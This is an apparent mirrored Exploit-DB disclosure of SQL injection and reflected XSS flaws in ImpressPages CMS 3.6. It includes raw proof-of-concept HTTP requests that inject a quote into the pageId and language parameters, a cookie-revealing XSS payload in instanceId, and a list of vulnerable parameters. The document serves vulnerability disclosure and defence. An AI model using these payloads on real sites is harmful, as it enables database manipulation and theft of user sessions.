header-logo
Suggest Exploit
vendor:
ImpressPages CMS
by:
Gjoko 'LiquidWorm' Krstic
7,5
CVSS
HIGH
Multiple XSS/SQLi
89, 89, 89
CWE
Product Name: ImpressPages CMS
Affected Version From: 3.6
Affected Version To: 3.6
Patch Exists: YES
Related CWE: N/A
CPE: a:impresspages_uab:impresspages_cms
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Microsoft Windows 7 Ultimate SP1 (EN), Apache 2.4.2, PHP 5.4.7, MySQL 5.5.25a
2013

ImpressPages CMS v3.6 Multiple XSS/SQLi Vulnerabilities

Input passed via several parameters is not properly sanitized before being returned to the user or used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code and HTML/script code in a user's browser session in context of an affected site.

Mitigation:

Input validation and sanitization should be implemented to prevent malicious code injection.
Source

Exploit-DB raw data:

ImpressPages CMS v3.6 Multiple XSS/SQLi Vulnerabilities


Vendor: ImpressPages UAB
Product web page: http://www.impresspages.org
Affected version: 3.6

Summary: ImpressPages CMS is an open source web content
management system with revolutionary drag & drop interface.

Desc: Input passed via several parameters is not properly
sanitized before being returned to the user or used in SQL
queries. This can be exploited to manipulate SQL queries by
injecting arbitrary SQL code and HTML/script code in a user's
browser session in context of an affected site.

Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
           Apache 2.4.2
           PHP 5.4.7
           MySQL 5.5.25a


Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
                              @zeroscience


Advisory ID: ZSL-2013-5157
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5157.php

Vendor: http://www.impresspages.org/blog/impresspages-cms-3-7-is-mobile-as-never-before/



12.10.2013

--

==================================

SQL Injection: (pageId param)

POST /impresspages/?cms_action=manage HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
Content-Length: 124
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://localhost
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.69 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://localhost/impresspages/?cms_action=manage
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Cookie: ses819=k7e9hu9pk4ol4h9l0lbt5q73u1

g=standard&m=content_management&a=getPageOptionsHtml&securityToken=c029f7293955df089676b78af8222d2a&pageId=64'&zoneName=menu1


==================================

SQL Injection: (language param)

POST /impresspages/admin.php?module_id=436&action=export&security_token=381cb48be4ed7445a9e6303e64ae87ac HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
Content-Length: 404
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.69 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybBHOjmAcICeilnDe
Referer: http://localhost/impresspages/admin.php?module_id=436&security_token=381cb48be4ed7445a9e6303e64ae87ac
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Cookie: ses819=k7e9hu9pk4ol4h9l0lbt5q73u1

------WebKitFormBoundarybBHOjmAcICeilnDe
Content-Disposition: form-data; name="language"

344'
------WebKitFormBoundarybBHOjmAcICeilnDe
Content-Disposition: form-data; name="spec_security_code"

9f1ff00ea8fd9fd8f2d421ba5ec45a18
------WebKitFormBoundarybBHOjmAcICeilnDe
Content-Disposition: form-data; name="spec_rand_name"

lib_php_form_standard_2_
------WebKitFormBoundarybBHOjmAcICeilnDe--


==================================

Reflected XSS POST parameters:

- files[0][file]
- instanceId
- pageOptions[buttonTitle]
- pageOptions[createdOn]
- pageOptions[description]
- pageOptions[keywords]
- pageOptions[lastModified]
- pageOptions[layout]
- pageOptions[pageTitle]
- pageOptions[redirectURL]
- pageOptions[rss]
- pageOptions[type]
- pageOptions[url]
- pageOptions[visible]
- revisionId
- widgetName
- pageSize[0]
- page[0]
- road[]


==================================

POST /impresspages/?cms_action=manage HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
Content-Length: 155
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://localhost
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.69 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://localhost/impresspages/?cms_action=manage
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Cookie: ses819=k7e9hu9pk4ol4h9l0lbt5q73u1

g=standard&m=content_management&a=deleteWidget&securityToken=c029f7293955df089676b78af8222d2a&instanceId=<img%20src%3da%20onerror%3dalert(document.cookie)>

...

Navigation

Suggest Exploit

Services By CQR